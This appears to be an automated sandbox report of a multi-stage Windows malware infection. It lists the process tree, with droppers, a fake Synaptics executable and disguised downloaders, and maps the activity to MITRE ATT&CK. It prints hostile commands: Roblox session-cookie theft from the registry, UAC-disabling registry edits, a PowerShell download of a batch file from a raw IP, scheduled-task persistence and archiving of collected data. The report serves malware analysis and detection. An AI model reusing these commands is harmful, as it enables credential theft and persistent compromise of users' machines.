C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1r1yg2x\f1r1yg2x.cmdline"7⤵PID:6708
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE510.tmp" "c:\Users\Admin\AppData\Local\Temp\f1r1yg2x\CSCD7A38B50AB2B4DCDA52B2972145BEDF.TMP"8⤵PID:6740
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:7080
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:6368
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:6548
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:5828
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2256
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:7144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:7108
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:6424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:6520
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4688
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"5⤵PID:6812
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15366⤵
- Kills process with taskkill
PID:6816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"5⤵PID:6648
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15366⤵
- Kills process with taskkill
PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"5⤵PID:6464
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41926⤵
- Kills process with taskkill
PID:7140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5796
-
C:\Windows\system32\getmac.exegetmac6⤵PID:5404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"5⤵PID:2256
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5366⤵
- Kills process with taskkill
PID:7068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"5⤵PID:6916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6708
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41926⤵
- Kills process with taskkill
PID:3652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"5⤵PID:6844
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5366⤵
- Kills process with taskkill
PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"5⤵PID:6300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6368
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20326⤵
- Kills process with taskkill
PID:5772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"5⤵PID:6028
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 43726⤵
- Kills process with taskkill
PID:6868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"5⤵PID:6980
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20326⤵
- Kills process with taskkill
PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"5⤵PID:4444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5188
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 3766⤵
- Kills process with taskkill
PID:6000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"5⤵PID:4984
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 43726⤵
- Kills process with taskkill
PID:6532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"5⤵PID:3140
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36286⤵
- Kills process with taskkill
PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"5⤵PID:2136
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 3766⤵
- Kills process with taskkill
PID:5368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"5⤵PID:5364
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55446⤵
- Kills process with taskkill
PID:7124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"5⤵PID:5972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6372
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36286⤵
- Kills process with taskkill
PID:5388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"5⤵PID:6780
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55566⤵
- Kills process with taskkill
PID:6192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"5⤵PID:6672
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55446⤵
- Kills process with taskkill
PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:1216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"5⤵PID:1872
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55566⤵
- Kills process with taskkill
PID:6952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:6124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *"5⤵PID:7092
-
C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *6⤵
- Executes dropped EXE
PID:6992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:5404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5796
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:6624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:6428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4688
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:6620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5508
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:4452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:2568
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:5352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe"C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe"C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6076
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\6FA3.tmp\6FA4.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)6⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71E4.tmp\71E5.tmp\71E6.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"8⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F9⤵
- UAC bypass
PID:3140
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F9⤵
- UAC bypass
PID:2104
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F9⤵
- UAC bypass
PID:836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"9⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command10⤵PID:3172
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/9⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe1e646f8,0x7ffbe1e64708,0x7ffbe1e6471810⤵PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2380 /prefetch:210⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:310⤵
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:810⤵PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:110⤵PID:376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:110⤵PID:3628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:110⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:810⤵PID:3140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:810⤵
- Suspicious behavior: EnumeratesProcesses
PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:110⤵PID:5296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:110⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:110⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:110⤵PID:5556
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:3176
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6036 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "payload.bat"5⤵PID:6068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"6⤵PID:5084
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_PointingDevice get PNPDeviceID /value7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\find.exefind "PNPDeviceID"7⤵PID:4632
-
-
-
C:\Windows\system32\curl.execurl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent6⤵
- Downloads MZ/PE file
PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exepython-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=06⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4056 -
C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe"C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=504 -burn.filehandle.self=556 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=07⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:5176 -
C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe"C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{B829E01E-B060-48EA-9C4E-7C09CEFD5DCE} {628768F2-F35B-48B8-A113-8B782201E304} 51768⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4240
-
-
-
-
C:\Windows\system32\curl.execurl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure6⤵PID:6672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:2936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 3525⤵
- Program crash
PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp"C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp" /SL5="$A0292,699759,54272,C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe"4⤵
- Executes dropped EXE
PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3164
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4504
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5396 -
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5408
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:6472
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:21⤵PID:6724
-
C:\ProgramData\Desktop Window Manager.exe"C:\ProgramData\Desktop Window Manager.exe"1⤵
- Executes dropped EXE
PID:6260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2936 -ip 29361⤵PID:6596
-
C:\ProgramData\Desktop Window Manager.exe"C:\ProgramData\Desktop Window Manager.exe"1⤵
- Executes dropped EXE
PID:2264
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
6System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
307B
MD5f795d65e68db37483dc74e692495e0b5
SHA1e021c93cc3604b1b8fe1b0fe9de76bc68fa529ae
